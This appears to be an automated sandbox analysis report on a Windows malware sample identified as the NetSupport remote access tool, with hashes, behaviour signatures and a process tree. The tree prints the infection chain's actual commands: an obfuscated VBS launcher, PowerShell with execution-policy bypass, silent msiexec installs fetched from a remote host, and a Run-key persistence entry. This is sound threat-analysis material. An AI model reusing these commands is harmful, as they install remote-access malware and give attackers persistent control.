Analysis
-
max time kernel
106s -
max time network
153s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
29-10-2020 16:41
Static task
static1
Behavioral task
behavioral1
Sample
signed_gate6.bin.exe
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
signed_gate6.bin.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
signed_gate6.bin.exe
-
Size
3.8MB
-
MD5
5b31c8bf67eea804fa636876a1828d20
-
SHA1
0f9862e659b5cd1233a7796d51e062d217df3c75
-
SHA256
a61bc88a1a994952b622c7eb01bfa9be65591c8cb5e69c4dae56edbd94deb384
-
SHA512
bf7175eb313fd1949e36056d478699327a05cbff1d5a0e68c4664df7c202197a25332ba270c8a5300367cf8d4b711d682d535071ce6c11ed125dd78c75f2909b
Score
10/10
Malware Config
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blacklisted process makes network request 1 IoCs
flow pid Process 10 1792 msiexec.exe -
Executes dropped EXE 1 IoCs
pid Process 1964 fonthost.exe -
Loads dropped DLL 8 IoCs
pid Process 1916 signed_gate6.bin.exe 1916 signed_gate6.bin.exe 1916 signed_gate6.bin.exe 1964 fonthost.exe 1964 fonthost.exe 1964 fonthost.exe 1964 fonthost.exe 1964 fonthost.exe -
Use of msiexec (install) with remote resource 2 IoCs
pid Process 552 msiexec.exe 1436 msiexec.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\fonthost = "C:\\Users\\Admin\\AppData\\Roaming\\W4mcAMtZ\\fonthost.exe" reg.exe -
JavaScript code in executable 2 IoCs
resource yara_rule behavioral1/files/0x0003000000013154-23.dat js behavioral1/files/0x0003000000013154-22.dat js -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1796 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1492 powershell.exe 1492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 67 IoCs
description pid Process Token: SeDebugPrivilege 1492 powershell.exe Token: SeShutdownPrivilege 552 msiexec.exe Token: SeIncreaseQuotaPrivilege 552 msiexec.exe Token: SeRestorePrivilege 1792 msiexec.exe Token: SeTakeOwnershipPrivilege 1792 msiexec.exe Token: SeSecurityPrivilege 1792 msiexec.exe Token: SeCreateTokenPrivilege 552 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 552 msiexec.exe Token: SeLockMemoryPrivilege 552 msiexec.exe Token: SeIncreaseQuotaPrivilege 552 msiexec.exe Token: SeMachineAccountPrivilege 552 msiexec.exe Token: SeTcbPrivilege 552 msiexec.exe Token: SeSecurityPrivilege 552 msiexec.exe Token: SeTakeOwnershipPrivilege 552 msiexec.exe Token: SeLoadDriverPrivilege 552 msiexec.exe Token: SeSystemProfilePrivilege 552 msiexec.exe Token: SeSystemtimePrivilege 552 msiexec.exe Token: SeProfSingleProcessPrivilege 552 msiexec.exe Token: SeIncBasePriorityPrivilege 552 msiexec.exe Token: SeCreatePagefilePrivilege 552 msiexec.exe Token: SeCreatePermanentPrivilege 552 msiexec.exe Token: SeBackupPrivilege 552 msiexec.exe Token: SeRestorePrivilege 552 msiexec.exe Token: SeShutdownPrivilege 552 msiexec.exe Token: SeDebugPrivilege 552 msiexec.exe Token: SeAuditPrivilege 552 msiexec.exe Token: SeSystemEnvironmentPrivilege 552 msiexec.exe Token: SeChangeNotifyPrivilege 552 msiexec.exe Token: SeRemoteShutdownPrivilege 552 msiexec.exe Token: SeUndockPrivilege 552 msiexec.exe Token: SeSyncAgentPrivilege 552 msiexec.exe Token: SeEnableDelegationPrivilege 552 msiexec.exe Token: SeManageVolumePrivilege 552 msiexec.exe Token: SeImpersonatePrivilege 552 msiexec.exe Token: SeCreateGlobalPrivilege 552 msiexec.exe Token: SeShutdownPrivilege 1436 msiexec.exe Token: SeIncreaseQuotaPrivilege 1436 msiexec.exe Token: SeSecurityPrivilege 1964 fonthost.exe Token: SeCreateTokenPrivilege 1436 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1436 msiexec.exe Token: SeLockMemoryPrivilege 1436 msiexec.exe Token: SeIncreaseQuotaPrivilege 1436 msiexec.exe Token: SeMachineAccountPrivilege 1436 msiexec.exe Token: SeTcbPrivilege 1436 msiexec.exe Token: SeSecurityPrivilege 1436 msiexec.exe Token: SeTakeOwnershipPrivilege 1436 msiexec.exe Token: SeLoadDriverPrivilege 1436 msiexec.exe Token: SeSystemProfilePrivilege 1436 msiexec.exe Token: SeSystemtimePrivilege 1436 msiexec.exe Token: SeProfSingleProcessPrivilege 1436 msiexec.exe Token: SeIncBasePriorityPrivilege 1436 msiexec.exe Token: SeCreatePagefilePrivilege 1436 msiexec.exe Token: SeCreatePermanentPrivilege 1436 msiexec.exe Token: SeBackupPrivilege 1436 msiexec.exe Token: SeRestorePrivilege 1436 msiexec.exe Token: SeShutdownPrivilege 1436 msiexec.exe Token: SeDebugPrivilege 1436 msiexec.exe Token: SeAuditPrivilege 1436 msiexec.exe Token: SeSystemEnvironmentPrivilege 1436 msiexec.exe Token: SeChangeNotifyPrivilege 1436 msiexec.exe Token: SeRemoteShutdownPrivilege 1436 msiexec.exe Token: SeUndockPrivilege 1436 msiexec.exe Token: SeSyncAgentPrivilege 1436 msiexec.exe Token: SeEnableDelegationPrivilege 1436 msiexec.exe Token: SeManageVolumePrivilege 1436 msiexec.exe Token: SeImpersonatePrivilege 1436 msiexec.exe Token: SeCreateGlobalPrivilege 1436 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1964 fonthost.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 1916 wrote to memory of 1572 1916 signed_gate6.bin.exe 29 PID 1916 wrote to memory of 1572 1916 signed_gate6.bin.exe 29 PID 1916 wrote to memory of 1572 1916 signed_gate6.bin.exe 29 PID 1916 wrote to memory of 1572 1916 signed_gate6.bin.exe 29 PID 1572 wrote to memory of 1624 1572 cmd.exe 31 PID 1572 wrote to memory of 1624 1572 cmd.exe 31 PID 1572 wrote to memory of 1624 1572 cmd.exe 31 PID 1624 wrote to memory of 788 1624 wscript.exe 32 PID 1624 wrote to memory of 788 1624 wscript.exe 32 PID 1624 wrote to memory of 788 1624 wscript.exe 32 PID 788 wrote to memory of 1552 788 cmd.exe 34 PID 788 wrote to memory of 1552 788 cmd.exe 34 PID 788 wrote to memory of 1552 788 cmd.exe 34 PID 1552 wrote to memory of 1492 1552 cmd.exe 35 PID 1552 wrote to memory of 1492 1552 cmd.exe 35 PID 1552 wrote to memory of 1492 1552 cmd.exe 35 PID 1492 wrote to memory of 552 1492 powershell.exe 36 PID 1492 wrote to memory of 552 1492 powershell.exe 36 PID 1492 wrote to memory of 552 1492 powershell.exe 36 PID 1492 wrote to memory of 552 1492 powershell.exe 36 PID 1492 wrote to memory of 552 1492 powershell.exe 36 PID 1492 wrote to memory of 1796 1492 powershell.exe 38 PID 1492 wrote to memory of 1796 1492 powershell.exe 38 PID 1492 wrote to memory of 1796 1492 powershell.exe 38 PID 1492 wrote to memory of 1964 1492 powershell.exe 39 PID 1492 wrote to memory of 1964 1492 powershell.exe 39 PID 1492 wrote to memory of 1964 1492 powershell.exe 39 PID 1492 wrote to memory of 1964 1492 powershell.exe 39 PID 1492 wrote to memory of 1436 1492 powershell.exe 40 PID 1492 wrote to memory of 1436 1492 powershell.exe 40 PID 1492 wrote to memory of 1436 1492 powershell.exe 40 PID 1492 wrote to memory of 1436 1492 powershell.exe 40 PID 1492 wrote to memory of 1436 1492 powershell.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe"C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ec^h^o CreateObject("Wscript.Shell").Run "cmd /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1", 0, False > %appdata%\NWNCDTYSWS.vb^s& wscript %appdata%\NWNCDTYSWS.vb^s& del %appdata%\NWNCDTYSWS.vb^s2⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Roaming\NWNCDTYSWS.vbs3⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps14⤵
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\system32\cmd.execmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps15⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps16⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installing_TUICJFPF /q7⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v fonthost /t REG_SZ /d C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:1796
-
-
C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe"C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1964
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installed_TUICJFPF /q7⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1792